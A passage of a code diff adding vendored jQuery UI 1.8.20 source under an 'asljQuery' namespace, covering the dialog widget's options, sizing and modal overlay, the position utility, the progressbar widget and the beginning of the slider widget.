9347 |
+
// need to show the dialog to get the actual offset in the position plugin
|
9348 |
+
isVisible = this.uiDialog.is(':visible');
|
9349 |
+
if (!isVisible) {
|
9350 |
+
this.uiDialog.show();
|
9351 |
+
}
|
9352 |
+
this.uiDialog
|
9353 |
+
// workaround for jQuery bug #5781 http://dev.jquery.com/ticket/5781
|
9354 |
+
.css({ top: 0, left: 0 })
|
9355 |
+
.position($.extend({ of: window }, position));
|
9356 |
+
if (!isVisible) {
|
9357 |
+
this.uiDialog.hide();
|
9358 |
+
}
|
9359 |
+
},
|
9360 |
+
|
9361 |
+
_setOptions: function( options ) {
|
9362 |
+
var self = this,
|
9363 |
+
resizableOptions = {},
|
9364 |
+
resize = false;
|
9365 |
+
|
9366 |
+
$.each( options, function( key, value ) {
|
9367 |
+
self._setOption( key, value );
|
9368 |
+
|
9369 |
+
if ( key in sizeRelatedOptions ) {
|
9370 |
+
resize = true;
|
9371 |
+
}
|
9372 |
+
if ( key in resizableRelatedOptions ) {
|
9373 |
+
resizableOptions[ key ] = value;
|
9374 |
+
}
|
9375 |
+
});
|
9376 |
+
|
9377 |
+
if ( resize ) {
|
9378 |
+
this._size();
|
9379 |
+
}
|
9380 |
+
if ( this.uiDialog.is( ":data(resizable)" ) ) {
|
9381 |
+
this.uiDialog.resizable( "option", resizableOptions );
|
9382 |
+
}
|
9383 |
+
},
|
9384 |
+
|
9385 |
+
_setOption: function(key, value){
|
9386 |
+
var self = this,
|
9387 |
+
uiDialog = self.uiDialog;
|
9388 |
+
|
9389 |
+
switch (key) {
|
9390 |
+
//handling of deprecated beforeclose (vs beforeClose) option
|
9391 |
+
//Ticket #4669 http://dev.jqueryui.com/ticket/4669
|
9392 |
+
//TODO: remove in 1.9pre
|
9393 |
+
case "beforeclose":
|
9394 |
+
key = "beforeClose";
|
9395 |
+
break;
|
9396 |
+
case "buttons":
|
9397 |
+
self._createButtons(value);
|
9398 |
+
break;
|
9399 |
+
case "closeText":
|
9400 |
+
// ensure that we always pass a string
|
9401 |
+
self.uiDialogTitlebarCloseText.text("" + value);
|
9402 |
+
break;
|
9403 |
+
case "dialogClass":
|
9404 |
+
uiDialog
|
9405 |
+
.removeClass(self.options.dialogClass)
|
9406 |
+
.addClass(uiDialogClasses + value);
|
9407 |
+
break;
|
9408 |
+
case "disabled":
|
9409 |
+
if (value) {
|
9410 |
+
uiDialog.addClass('ui-dialog-disabled');
|
9411 |
+
} else {
|
9412 |
+
uiDialog.removeClass('ui-dialog-disabled');
|
9413 |
+
}
|
9414 |
+
break;
|
9415 |
+
case "draggable":
|
9416 |
+
var isDraggable = uiDialog.is( ":data(draggable)" );
|
9417 |
+
if ( isDraggable && !value ) {
|
9418 |
+
uiDialog.draggable( "destroy" );
|
9419 |
+
}
|
9420 |
+
|
9421 |
+
if ( !isDraggable && value ) {
|
9422 |
+
self._makeDraggable();
|
9423 |
+
}
|
9424 |
+
break;
|
9425 |
+
case "position":
|
9426 |
+
self._position(value);
|
9427 |
+
break;
|
9428 |
+
case "resizable":
|
9429 |
+
// currently resizable, becoming non-resizable
|
9430 |
+
var isResizable = uiDialog.is( ":data(resizable)" );
|
9431 |
+
if (isResizable && !value) {
|
9432 |
+
uiDialog.resizable('destroy');
|
9433 |
+
}
|
9434 |
+
|
9435 |
+
// currently resizable, changing handles
|
9436 |
+
if (isResizable && typeof value === 'string') {
|
9437 |
+
uiDialog.resizable('option', 'handles', value);
|
9438 |
+
}
|
9439 |
+
|
9440 |
+
// currently non-resizable, becoming resizable
|
9441 |
+
if (!isResizable && value !== false) {
|
9442 |
+
self._makeResizable(value);
|
9443 |
+
}
|
9444 |
+
break;
|
9445 |
+
case "title":
|
9446 |
+
// convert whatever was passed in o a string, for html() to not throw up
|
9447 |
+
$(".ui-dialog-title", self.uiDialogTitlebar).html("" + (value || ' '));
|
9448 |
+
break;
|
9449 |
+
}
|
9450 |
+
|
9451 |
+
$.Widget.prototype._setOption.apply(self, arguments);
|
9452 |
+
},
|
9453 |
+
|
9454 |
+
_size: function() {
|
9455 |
+
/* If the user has resized the dialog, the .ui-dialog and .ui-dialog-content
|
9456 |
+
* divs will both have width and height set, so we need to reset them
|
9457 |
+
*/
|
9458 |
+
var options = this.options,
|
9459 |
+
nonContentHeight,
|
9460 |
+
minContentHeight,
|
9461 |
+
isVisible = this.uiDialog.is( ":visible" );
|
9462 |
+
|
9463 |
+
// reset content sizing
|
9464 |
+
this.element.show().css({
|
9465 |
+
width: 'auto',
|
9466 |
+
minHeight: 0,
|
9467 |
+
height: 0
|
9468 |
+
});
|
9469 |
+
|
9470 |
+
if (options.minWidth > options.width) {
|
9471 |
+
options.width = options.minWidth;
|
9472 |
+
}
|
9473 |
+
|
9474 |
+
// reset wrapper sizing
|
9475 |
+
// determine the height of all the non-content elements
|
9476 |
+
nonContentHeight = this.uiDialog.css({
|
9477 |
+
height: 'auto',
|
9478 |
+
width: options.width
|
9479 |
+
})
|
9480 |
+
.height();
|
9481 |
+
minContentHeight = Math.max( 0, options.minHeight - nonContentHeight );
|
9482 |
+
|
9483 |
+
if ( options.height === "auto" ) {
|
9484 |
+
// only needed for IE6 support
|
9485 |
+
if ( $.support.minHeight ) {
|
9486 |
+
this.element.css({
|
9487 |
+
minHeight: minContentHeight,
|
9488 |
+
height: "auto"
|
9489 |
+
});
|
9490 |
+
} else {
|
9491 |
+
this.uiDialog.show();
|
9492 |
+
var autoHeight = this.element.css( "height", "auto" ).height();
|
9493 |
+
if ( !isVisible ) {
|
9494 |
+
this.uiDialog.hide();
|
9495 |
+
}
|
9496 |
+
this.element.height( Math.max( autoHeight, minContentHeight ) );
|
9497 |
+
}
|
9498 |
+
} else {
|
9499 |
+
this.element.height( Math.max( options.height - nonContentHeight, 0 ) );
|
9500 |
+
}
|
9501 |
+
|
9502 |
+
if (this.uiDialog.is(':data(resizable)')) {
|
9503 |
+
this.uiDialog.resizable('option', 'minHeight', this._minHeight());
|
9504 |
+
}
|
9505 |
+
}
|
9506 |
+
});
|
9507 |
+
|
9508 |
+
$.extend($.ui.dialog, {
|
9509 |
+
version: "1.8.20",
|
9510 |
+
|
9511 |
+
uuid: 0,
|
9512 |
+
maxZ: 0,
|
9513 |
+
|
9514 |
+
getTitleId: function($el) {
|
9515 |
+
var id = $el.attr('id');
|
9516 |
+
if (!id) {
|
9517 |
+
this.uuid += 1;
|
9518 |
+
id = this.uuid;
|
9519 |
+
}
|
9520 |
+
return 'ui-dialog-title-' + id;
|
9521 |
+
},
|
9522 |
+
|
9523 |
+
overlay: function(dialog) {
|
9524 |
+
this.$el = $.ui.dialog.overlay.create(dialog);
|
9525 |
+
}
|
9526 |
+
});
|
9527 |
+
|
9528 |
+
$.extend($.ui.dialog.overlay, {
|
9529 |
+
instances: [],
|
9530 |
+
// reuse old instances due to IE memory leak with alpha transparency (see #5185)
|
9531 |
+
oldInstances: [],
|
9532 |
+
maxZ: 0,
|
9533 |
+
events: $.map('focus,mousedown,mouseup,keydown,keypress,click'.split(','),
|
9534 |
+
function(event) { return event + '.dialog-overlay'; }).join(' '),
|
9535 |
+
create: function(dialog) {
|
9536 |
+
if (this.instances.length === 0) {
|
9537 |
+
// prevent use of anchors and inputs
|
9538 |
+
// we use a setTimeout in case the overlay is created from an
|
9539 |
+
// event that we're going to be cancelling (see #2804)
|
9540 |
+
setTimeout(function() {
|
9541 |
+
// handle $(el).dialog().dialog('close') (see #4065)
|
9542 |
+
if ($.ui.dialog.overlay.instances.length) {
|
9543 |
+
$(document).bind($.ui.dialog.overlay.events, function(event) {
|
9544 |
+
// stop events if the z-index of the target is < the z-index of the overlay
|
9545 |
+
// we cannot return true when we don't want to cancel the event (#3523)
|
9546 |
+
if ($(event.target).zIndex() < $.ui.dialog.overlay.maxZ) {
|
9547 |
+
return false;
|
9548 |
+
}
|
9549 |
+
});
|
9550 |
+
}
|
9551 |
+
}, 1);
|
9552 |
+
|
9553 |
+
// allow closing by pressing the escape key
|
9554 |
+
$(document).bind('keydown.dialog-overlay', function(event) {
|
9555 |
+
if (dialog.options.closeOnEscape && !event.isDefaultPrevented() && event.keyCode &&
|
9556 |
+
event.keyCode === $.ui.keyCode.ESCAPE) {
|
9557 |
+
|
9558 |
+
dialog.close(event);
|
9559 |
+
event.preventDefault();
|
9560 |
+
}
|
9561 |
+
});
|
9562 |
+
|
9563 |
+
// handle window resize
|
9564 |
+
$(window).bind('resize.dialog-overlay', $.ui.dialog.overlay.resize);
|
9565 |
+
}
|
9566 |
+
|
9567 |
+
var $el = (this.oldInstances.pop() || $('<div></div>').addClass('ui-widget-overlay'))
|
9568 |
+
.appendTo(document.body)
|
9569 |
+
.css({
|
9570 |
+
width: this.width(),
|
9571 |
+
height: this.height()
|
9572 |
+
});
|
9573 |
+
|
9574 |
+
if ($.fn.bgiframe) {
|
9575 |
+
$el.bgiframe();
|
9576 |
+
}
|
9577 |
+
|
9578 |
+
this.instances.push($el);
|
9579 |
+
return $el;
|
9580 |
+
},
|
9581 |
+
|
9582 |
+
destroy: function($el) {
|
9583 |
+
var indexOf = $.inArray($el, this.instances);
|
9584 |
+
if (indexOf != -1){
|
9585 |
+
this.oldInstances.push(this.instances.splice(indexOf, 1)[0]);
|
9586 |
+
}
|
9587 |
+
|
9588 |
+
if (this.instances.length === 0) {
|
9589 |
+
$([document, window]).unbind('.dialog-overlay');
|
9590 |
+
}
|
9591 |
+
|
9592 |
+
$el.remove();
|
9593 |
+
|
9594 |
+
// adjust the maxZ to allow other modal dialogs to continue to work (see #4309)
|
9595 |
+
var maxZ = 0;
|
9596 |
+
$.each(this.instances, function() {
|
9597 |
+
maxZ = Math.max(maxZ, this.css('z-index'));
|
9598 |
+
});
|
9599 |
+
this.maxZ = maxZ;
|
9600 |
+
},
|
9601 |
+
|
9602 |
+
height: function() {
|
9603 |
+
var scrollHeight,
|
9604 |
+
offsetHeight;
|
9605 |
+
// handle IE 6
|
9606 |
+
if ($.browser.msie && $.browser.version < 7) {
|
9607 |
+
scrollHeight = Math.max(
|
9608 |
+
document.documentElement.scrollHeight,
|
9609 |
+
document.body.scrollHeight
|
9610 |
+
);
|
9611 |
+
offsetHeight = Math.max(
|
9612 |
+
document.documentElement.offsetHeight,
|
9613 |
+
document.body.offsetHeight
|
9614 |
+
);
|
9615 |
+
|
9616 |
+
if (scrollHeight < offsetHeight) {
|
9617 |
+
return $(window).height() + 'px';
|
9618 |
+
} else {
|
9619 |
+
return scrollHeight + 'px';
|
9620 |
+
}
|
9621 |
+
// handle "good" browsers
|
9622 |
+
} else {
|
9623 |
+
return $(document).height() + 'px';
|
9624 |
+
}
|
9625 |
+
},
|
9626 |
+
|
9627 |
+
width: function() {
|
9628 |
+
var scrollWidth,
|
9629 |
+
offsetWidth;
|
9630 |
+
// handle IE
|
9631 |
+
if ( $.browser.msie ) {
|
9632 |
+
scrollWidth = Math.max(
|
9633 |
+
document.documentElement.scrollWidth,
|
9634 |
+
document.body.scrollWidth
|
9635 |
+
);
|
9636 |
+
offsetWidth = Math.max(
|
9637 |
+
document.documentElement.offsetWidth,
|
9638 |
+
document.body.offsetWidth
|
9639 |
+
);
|
9640 |
+
|
9641 |
+
if (scrollWidth < offsetWidth) {
|
9642 |
+
return $(window).width() + 'px';
|
9643 |
+
} else {
|
9644 |
+
return scrollWidth + 'px';
|
9645 |
+
}
|
9646 |
+
// handle "good" browsers
|
9647 |
+
} else {
|
9648 |
+
return $(document).width() + 'px';
|
9649 |
+
}
|
9650 |
+
},
|
9651 |
+
|
9652 |
+
resize: function() {
|
9653 |
+
/* If the dialog is draggable and the user drags it past the
|
9654 |
+
* right edge of the window, the document becomes wider so we
|
9655 |
+
* need to stretch the overlay. If the user then drags the
|
9656 |
+
* dialog back to the left, the document will become narrower,
|
9657 |
+
* so we need to shrink the overlay to the appropriate size.
|
9658 |
+
* This is handled by shrinking the overlay before setting it
|
9659 |
+
* to the full document size.
|
9660 |
+
*/
|
9661 |
+
var $overlays = $([]);
|
9662 |
+
$.each($.ui.dialog.overlay.instances, function() {
|
9663 |
+
$overlays = $overlays.add(this);
|
9664 |
+
});
|
9665 |
+
|
9666 |
+
$overlays.css({
|
9667 |
+
width: 0,
|
9668 |
+
height: 0
|
9669 |
+
}).css({
|
9670 |
+
width: $.ui.dialog.overlay.width(),
|
9671 |
+
height: $.ui.dialog.overlay.height()
|
9672 |
+
});
|
9673 |
+
}
|
9674 |
+
});
|
9675 |
+
|
9676 |
+
$.extend($.ui.dialog.overlay.prototype, {
|
9677 |
+
destroy: function() {
|
9678 |
+
$.ui.dialog.overlay.destroy(this.$el);
|
9679 |
+
}
|
9680 |
+
});
|
9681 |
+
|
9682 |
+
}(asljQuery));
|
9683 |
+
|
9684 |
+
(function( $, undefined ) {
|
9685 |
+
|
9686 |
+
$.ui = $.ui || {};
|
9687 |
+
|
9688 |
+
var horizontalPositions = /left|center|right/,
|
9689 |
+
verticalPositions = /top|center|bottom/,
|
9690 |
+
center = "center",
|
9691 |
+
support = {},
|
9692 |
+
_position = $.fn.position,
|
9693 |
+
_offset = $.fn.offset;
|
9694 |
+
|
9695 |
+
$.fn.position = function( options ) {
|
9696 |
+
if ( !options || !options.of ) {
|
9697 |
+
return _position.apply( this, arguments );
|
9698 |
+
}
|
9699 |
+
|
9700 |
+
// make a copy, we don't want to modify arguments
|
9701 |
+
options = $.extend( {}, options );
|
9702 |
+
|
9703 |
+
var target = $( options.of ),
|
9704 |
+
targetElem = target[0],
|
9705 |
+
collision = ( options.collision || "flip" ).split( " " ),
|
9706 |
+
offset = options.offset ? options.offset.split( " " ) : [ 0, 0 ],
|
9707 |
+
targetWidth,
|
9708 |
+
targetHeight,
|
9709 |
+
basePosition;
|
9710 |
+
|
9711 |
+
if ( targetElem.nodeType === 9 ) {
|
9712 |
+
targetWidth = target.width();
|
9713 |
+
targetHeight = target.height();
|
9714 |
+
basePosition = { top: 0, left: 0 };
|
9715 |
+
// TODO: use $.isWindow() in 1.9
|
9716 |
+
} else if ( targetElem.setTimeout ) {
|
9717 |
+
targetWidth = target.width();
|
9718 |
+
targetHeight = target.height();
|
9719 |
+
basePosition = { top: target.scrollTop(), left: target.scrollLeft() };
|
9720 |
+
} else if ( targetElem.preventDefault ) {
|
9721 |
+
// force left top to allow flipping
|
9722 |
+
options.at = "left top";
|
9723 |
+
targetWidth = targetHeight = 0;
|
9724 |
+
basePosition = { top: options.of.pageY, left: options.of.pageX };
|
9725 |
+
} else {
|
9726 |
+
targetWidth = target.outerWidth();
|
9727 |
+
targetHeight = target.outerHeight();
|
9728 |
+
basePosition = target.offset();
|
9729 |
+
}
|
9730 |
+
|
9731 |
+
// force my and at to have valid horizontal and veritcal positions
|
9732 |
+
// if a value is missing or invalid, it will be converted to center
|
9733 |
+
$.each( [ "my", "at" ], function() {
|
9734 |
+
var pos = ( options[this] || "" ).split( " " );
|
9735 |
+
if ( pos.length === 1) {
|
9736 |
+
pos = horizontalPositions.test( pos[0] ) ?
|
9737 |
+
pos.concat( [center] ) :
|
9738 |
+
verticalPositions.test( pos[0] ) ?
|
9739 |
+
[ center ].concat( pos ) :
|
9740 |
+
[ center, center ];
|
9741 |
+
}
|
9742 |
+
pos[ 0 ] = horizontalPositions.test( pos[0] ) ? pos[ 0 ] : center;
|
9743 |
+
pos[ 1 ] = verticalPositions.test( pos[1] ) ? pos[ 1 ] : center;
|
9744 |
+
options[ this ] = pos;
|
9745 |
+
});
|
9746 |
+
|
9747 |
+
// normalize collision option
|
9748 |
+
if ( collision.length === 1 ) {
|
9749 |
+
collision[ 1 ] = collision[ 0 ];
|
9750 |
+
}
|
9751 |
+
|
9752 |
+
// normalize offset option
|
9753 |
+
offset[ 0 ] = parseInt( offset[0], 10 ) || 0;
|
9754 |
+
if ( offset.length === 1 ) {
|
9755 |
+
offset[ 1 ] = offset[ 0 ];
|
9756 |
+
}
|
9757 |
+
offset[ 1 ] = parseInt( offset[1], 10 ) || 0;
|
9758 |
+
|
9759 |
+
if ( options.at[0] === "right" ) {
|
9760 |
+
basePosition.left += targetWidth;
|
9761 |
+
} else if ( options.at[0] === center ) {
|
9762 |
+
basePosition.left += targetWidth / 2;
|
9763 |
+
}
|
9764 |
+
|
9765 |
+
if ( options.at[1] === "bottom" ) {
|
9766 |
+
basePosition.top += targetHeight;
|
9767 |
+
} else if ( options.at[1] === center ) {
|
9768 |
+
basePosition.top += targetHeight / 2;
|
9769 |
+
}
|
9770 |
+
|
9771 |
+
basePosition.left += offset[ 0 ];
|
9772 |
+
basePosition.top += offset[ 1 ];
|
9773 |
+
|
9774 |
+
return this.each(function() {
|
9775 |
+
var elem = $( this ),
|
9776 |
+
elemWidth = elem.outerWidth(),
|
9777 |
+
elemHeight = elem.outerHeight(),
|
9778 |
+
marginLeft = parseInt( $.curCSS( this, "marginLeft", true ) ) || 0,
|
9779 |
+
marginTop = parseInt( $.curCSS( this, "marginTop", true ) ) || 0,
|
9780 |
+
collisionWidth = elemWidth + marginLeft +
|
9781 |
+
( parseInt( $.curCSS( this, "marginRight", true ) ) || 0 ),
|
9782 |
+
collisionHeight = elemHeight + marginTop +
|
9783 |
+
( parseInt( $.curCSS( this, "marginBottom", true ) ) || 0 ),
|
9784 |
+
position = $.extend( {}, basePosition ),
|
9785 |
+
collisionPosition;
|
9786 |
+
|
9787 |
+
if ( options.my[0] === "right" ) {
|
9788 |
+
position.left -= elemWidth;
|
9789 |
+
} else if ( options.my[0] === center ) {
|
9790 |
+
position.left -= elemWidth / 2;
|
9791 |
+
}
|
9792 |
+
|
9793 |
+
if ( options.my[1] === "bottom" ) {
|
9794 |
+
position.top -= elemHeight;
|
9795 |
+
} else if ( options.my[1] === center ) {
|
9796 |
+
position.top -= elemHeight / 2;
|
9797 |
+
}
|
9798 |
+
|
9799 |
+
// prevent fractions if jQuery version doesn't support them (see #5280)
|
9800 |
+
if ( !support.fractions ) {
|
9801 |
+
position.left = Math.round( position.left );
|
9802 |
+
position.top = Math.round( position.top );
|
9803 |
+
}
|
9804 |
+
|
9805 |
+
collisionPosition = {
|
9806 |
+
left: position.left - marginLeft,
|
9807 |
+
top: position.top - marginTop
|
9808 |
+
};
|
9809 |
+
|
9810 |
+
$.each( [ "left", "top" ], function( i, dir ) {
|
9811 |
+
if ( $.ui.position[ collision[i] ] ) {
|
9812 |
+
$.ui.position[ collision[i] ][ dir ]( position, {
|
9813 |
+
targetWidth: targetWidth,
|
9814 |
+
targetHeight: targetHeight,
|
9815 |
+
elemWidth: elemWidth,
|
9816 |
+
elemHeight: elemHeight,
|
9817 |
+
collisionPosition: collisionPosition,
|
9818 |
+
collisionWidth: collisionWidth,
|
9819 |
+
collisionHeight: collisionHeight,
|
9820 |
+
offset: offset,
|
9821 |
+
my: options.my,
|
9822 |
+
at: options.at
|
9823 |
+
});
|
9824 |
+
}
|
9825 |
+
});
|
9826 |
+
|
9827 |
+
if ( $.fn.bgiframe ) {
|
9828 |
+
elem.bgiframe();
|
9829 |
+
}
|
9830 |
+
elem.offset( $.extend( position, { using: options.using } ) );
|
9831 |
+
});
|
9832 |
+
};
|
9833 |
+
|
9834 |
+
$.ui.position = {
|
9835 |
+
fit: {
|
9836 |
+
left: function( position, data ) {
|
9837 |
+
var win = $( window ),
|
9838 |
+
over = data.collisionPosition.left + data.collisionWidth - win.width() - win.scrollLeft();
|
9839 |
+
position.left = over > 0 ? position.left - over : Math.max( position.left - data.collisionPosition.left, position.left );
|
9840 |
+
},
|
9841 |
+
top: function( position, data ) {
|
9842 |
+
var win = $( window ),
|
9843 |
+
over = data.collisionPosition.top + data.collisionHeight - win.height() - win.scrollTop();
|
9844 |
+
position.top = over > 0 ? position.top - over : Math.max( position.top - data.collisionPosition.top, position.top );
|
9845 |
+
}
|
9846 |
+
},
|
9847 |
+
|
9848 |
+
flip: {
|
9849 |
+
left: function( position, data ) {
|
9850 |
+
if ( data.at[0] === center ) {
|
9851 |
+
return;
|
9852 |
+
}
|
9853 |
+
var win = $( window ),
|
9854 |
+
over = data.collisionPosition.left + data.collisionWidth - win.width() - win.scrollLeft(),
|
9855 |
+
myOffset = data.my[ 0 ] === "left" ?
|
9856 |
+
-data.elemWidth :
|
9857 |
+
data.my[ 0 ] === "right" ?
|
9858 |
+
data.elemWidth :
|
9859 |
+
0,
|
9860 |
+
atOffset = data.at[ 0 ] === "left" ?
|
9861 |
+
data.targetWidth :
|
9862 |
+
-data.targetWidth,
|
9863 |
+
offset = -2 * data.offset[ 0 ];
|
9864 |
+
position.left += data.collisionPosition.left < 0 ?
|
9865 |
+
myOffset + atOffset + offset :
|
9866 |
+
over > 0 ?
|
9867 |
+
myOffset + atOffset + offset :
|
9868 |
+
0;
|
9869 |
+
},
|
9870 |
+
top: function( position, data ) {
|
9871 |
+
if ( data.at[1] === center ) {
|
9872 |
+
return;
|
9873 |
+
}
|
9874 |
+
var win = $( window ),
|
9875 |
+
over = data.collisionPosition.top + data.collisionHeight - win.height() - win.scrollTop(),
|
9876 |
+
myOffset = data.my[ 1 ] === "top" ?
|
9877 |
+
-data.elemHeight :
|
9878 |
+
data.my[ 1 ] === "bottom" ?
|
9879 |
+
data.elemHeight :
|
9880 |
+
0,
|
9881 |
+
atOffset = data.at[ 1 ] === "top" ?
|
9882 |
+
data.targetHeight :
|
9883 |
+
-data.targetHeight,
|
9884 |
+
offset = -2 * data.offset[ 1 ];
|
9885 |
+
position.top += data.collisionPosition.top < 0 ?
|
9886 |
+
myOffset + atOffset + offset :
|
9887 |
+
over > 0 ?
|
9888 |
+
myOffset + atOffset + offset :
|
9889 |
+
0;
|
9890 |
+
}
|
9891 |
+
}
|
9892 |
+
};
|
9893 |
+
|
9894 |
+
// offset setter from jQuery 1.4
|
9895 |
+
if ( !$.offset.setOffset ) {
|
9896 |
+
$.offset.setOffset = function( elem, options ) {
|
9897 |
+
// set position first, in-case top/left are set even on static elem
|
9898 |
+
if ( /static/.test( $.curCSS( elem, "position" ) ) ) {
|
9899 |
+
elem.style.position = "relative";
|
9900 |
+
}
|
9901 |
+
var curElem = $( elem ),
|
9902 |
+
curOffset = curElem.offset(),
|
9903 |
+
curTop = parseInt( $.curCSS( elem, "top", true ), 10 ) || 0,
|
9904 |
+
curLeft = parseInt( $.curCSS( elem, "left", true ), 10) || 0,
|
9905 |
+
props = {
|
9906 |
+
top: (options.top - curOffset.top) + curTop,
|
9907 |
+
left: (options.left - curOffset.left) + curLeft
|
9908 |
+
};
|
9909 |
+
|
9910 |
+
if ( 'using' in options ) {
|
9911 |
+
options.using.call( elem, props );
|
9912 |
+
} else {
|
9913 |
+
curElem.css( props );
|
9914 |
+
}
|
9915 |
+
};
|
9916 |
+
|
9917 |
+
$.fn.offset = function( options ) {
|
9918 |
+
var elem = this[ 0 ];
|
9919 |
+
if ( !elem || !elem.ownerDocument ) { return null; }
|
9920 |
+
if ( options ) {
|
9921 |
+
return this.each(function() {
|
9922 |
+
$.offset.setOffset( this, options );
|
9923 |
+
});
|
9924 |
+
}
|
9925 |
+
return _offset.call( this );
|
9926 |
+
};
|
9927 |
+
}
|
9928 |
+
|
9929 |
+
// fraction support test (older versions of jQuery don't support fractions)
|
9930 |
+
(function () {
|
9931 |
+
var body = document.getElementsByTagName( "body" )[ 0 ],
|
9932 |
+
div = document.createElement( "div" ),
|
9933 |
+
testElement, testElementParent, testElementStyle, offset, offsetTotal;
|
9934 |
+
|
9935 |
+
//Create a "fake body" for testing based on method used in jQuery.support
|
9936 |
+
testElement = document.createElement( body ? "div" : "body" );
|
9937 |
+
testElementStyle = {
|
9938 |
+
visibility: "hidden",
|
9939 |
+
width: 0,
|
9940 |
+
height: 0,
|
9941 |
+
border: 0,
|
9942 |
+
margin: 0,
|
9943 |
+
background: "none"
|
9944 |
+
};
|
9945 |
+
if ( body ) {
|
9946 |
+
$.extend( testElementStyle, {
|
9947 |
+
position: "absolute",
|
9948 |
+
left: "-1000px",
|
9949 |
+
top: "-1000px"
|
9950 |
+
});
|
9951 |
+
}
|
9952 |
+
for ( var i in testElementStyle ) {
|
9953 |
+
testElement.style[ i ] = testElementStyle[ i ];
|
9954 |
+
}
|
9955 |
+
testElement.appendChild( div );
|
9956 |
+
testElementParent = body || document.documentElement;
|
9957 |
+
testElementParent.insertBefore( testElement, testElementParent.firstChild );
|
9958 |
+
|
9959 |
+
div.style.cssText = "position: absolute; left: 10.7432222px; top: 10.432325px; height: 30px; width: 201px;";
|
9960 |
+
|
9961 |
+
offset = $( div ).offset( function( _, offset ) {
|
9962 |
+
return offset;
|
9963 |
+
}).offset();
|
9964 |
+
|
9965 |
+
testElement.innerHTML = "";
|
9966 |
+
testElementParent.removeChild( testElement );
|
9967 |
+
|
9968 |
+
offsetTotal = offset.top + offset.left + ( body ? 2000 : 0 );
|
9969 |
+
support.fractions = offsetTotal > 21 && offsetTotal < 22;
|
9970 |
+
})();
|
9971 |
+
|
9972 |
+
}(asljQuery));
|
9973 |
+
|
9974 |
+
(function( $, undefined ) {
|
9975 |
+
|
9976 |
+
$.widget( "ui.progressbar", {
|
9977 |
+
options: {
|
9978 |
+
value: 0,
|
9979 |
+
max: 100
|
9980 |
+
},
|
9981 |
+
|
9982 |
+
min: 0,
|
9983 |
+
|
9984 |
+
_create: function() {
|
9985 |
+
this.element
|
9986 |
+
.addClass( "ui-progressbar ui-widget ui-widget-content ui-corner-all" )
|
9987 |
+
.attr({
|
9988 |
+
role: "progressbar",
|
9989 |
+
"aria-valuemin": this.min,
|
9990 |
+
"aria-valuemax": this.options.max,
|
9991 |
+
"aria-valuenow": this._value()
|
9992 |
+
});
|
9993 |
+
|
9994 |
+
this.valueDiv = $( "<div class='ui-progressbar-value ui-widget-header ui-corner-left'></div>" )
|
9995 |
+
.appendTo( this.element );
|
9996 |
+
|
9997 |
+
this.oldValue = this._value();
|
9998 |
+
this._refreshValue();
|
9999 |
+
},
|
10000 |
+
|
10001 |
+
destroy: function() {
|
10002 |
+
this.element
|
10003 |
+
.removeClass( "ui-progressbar ui-widget ui-widget-content ui-corner-all" )
|
10004 |
+
.removeAttr( "role" )
|
10005 |
+
.removeAttr( "aria-valuemin" )
|
10006 |
+
.removeAttr( "aria-valuemax" )
|
10007 |
+
.removeAttr( "aria-valuenow" );
|
10008 |
+
|
10009 |
+
this.valueDiv.remove();
|
10010 |
+
|
10011 |
+
$.Widget.prototype.destroy.apply( this, arguments );
|
10012 |
+
},
|
10013 |
+
|
10014 |
+
value: function( newValue ) {
|
10015 |
+
if ( newValue === undefined ) {
|
10016 |
+
return this._value();
|
10017 |
+
}
|
10018 |
+
|
10019 |
+
this._setOption( "value", newValue );
|
10020 |
+
return this;
|
10021 |
+
},
|
10022 |
+
|
10023 |
+
_setOption: function( key, value ) {
|
10024 |
+
if ( key === "value" ) {
|
10025 |
+
this.options.value = value;
|
10026 |
+
this._refreshValue();
|
10027 |
+
if ( this._value() === this.options.max ) {
|
10028 |
+
this._trigger( "complete" );
|
10029 |
+
}
|
10030 |
+
}
|
10031 |
+
|
10032 |
+
$.Widget.prototype._setOption.apply( this, arguments );
|
10033 |
+
},
|
10034 |
+
|
10035 |
+
_value: function() {
|
10036 |
+
var val = this.options.value;
|
10037 |
+
// normalize invalid value
|
10038 |
+
if ( typeof val !== "number" ) {
|
10039 |
+
val = 0;
|
10040 |
+
}
|
10041 |
+
return Math.min( this.options.max, Math.max( this.min, val ) );
|
10042 |
+
},
|
10043 |
+
|
10044 |
+
_percentage: function() {
|
10045 |
+
return 100 * this._value() / this.options.max;
|
10046 |
+
},
|
10047 |
+
|
10048 |
+
_refreshValue: function() {
|
10049 |
+
var value = this.value();
|
10050 |
+
var percentage = this._percentage();
|
10051 |
+
|
10052 |
+
if ( this.oldValue !== value ) {
|
10053 |
+
this.oldValue = value;
|
10054 |
+
this._trigger( "change" );
|
10055 |
+
}
|
10056 |
+
|
10057 |
+
this.valueDiv
|
10058 |
+
.toggle( value > this.min )
|
10059 |
+
.toggleClass( "ui-corner-right", value === this.options.max )
|
10060 |
+
.width( percentage.toFixed(0) + "%" );
|
10061 |
+
this.element.attr( "aria-valuenow", value );
|
10062 |
+
}
|
10063 |
+
});
|
10064 |
+
|
10065 |
+
$.extend( $.ui.progressbar, {
|
10066 |
+
version: "1.8.20"
|
10067 |
+
});
|
10068 |
+
|
10069 |
+
})(asljQuery);
|
10070 |
+
|
10071 |
+
(function( $, undefined ) {
|
10072 |
+
|
10073 |
+
// number of pages in a slider
|
10074 |
+
// (how many times can you page up/down to go through the whole range)
|
10075 |
+
var numPages = 5;
|
10076 |
+
|
10077 |
+
$.widget( "ui.slider", $.ui.mouse, {
|
10078 |
+
|
10079 |
+
widgetEventPrefix: "slide",
|
10080 |
+
|
10081 |
+
options: {
|
10082 |
+
animate: false,
|
10083 |
+
distance: 0,
|
10084 |
+
max: 100,
|
10085 |
+
min: 0,
|
10086 |
+
orientation: "horizontal",
|
10087 |
+
range: false,
|
10088 |
+
step: 1,
|
10089 |
+
value: 0,
|
10090 |
+
values: null
|
10091 |
+
},
|
10092 |
+
|
10093 |
+
_create: function() {
|
10094 |
+
var self = this,
|
10095 |
+
o = this.options,
|
10096 |
+
existingHandles = this.element.find( ".ui-slider-handle" ).addClass( "ui-state-default ui-corner-all" ),
|
10097 |
+
handle = "<a class='ui-slider-handle ui-state-default ui-corner-all' href='#'></a>",
|
10098 |
+
handleCount = ( o.values && o.values.length ) || 1,
|
10099 |
+
handles = [];
|
10100 |
+
|
10101 |
+
this._keySliding = false;
|
10102 |
+
this._mouseSliding = false;
|
10103 |
+
this._animateOff = true;
|
10104 |
+
this._handleIndex = null;
|
10105 |
+
this._detectOrientation();
|
10106 |
+
this._mouseInit();
|
10107 |
+
|
10108 |
+
this.element
|
10109 |
+
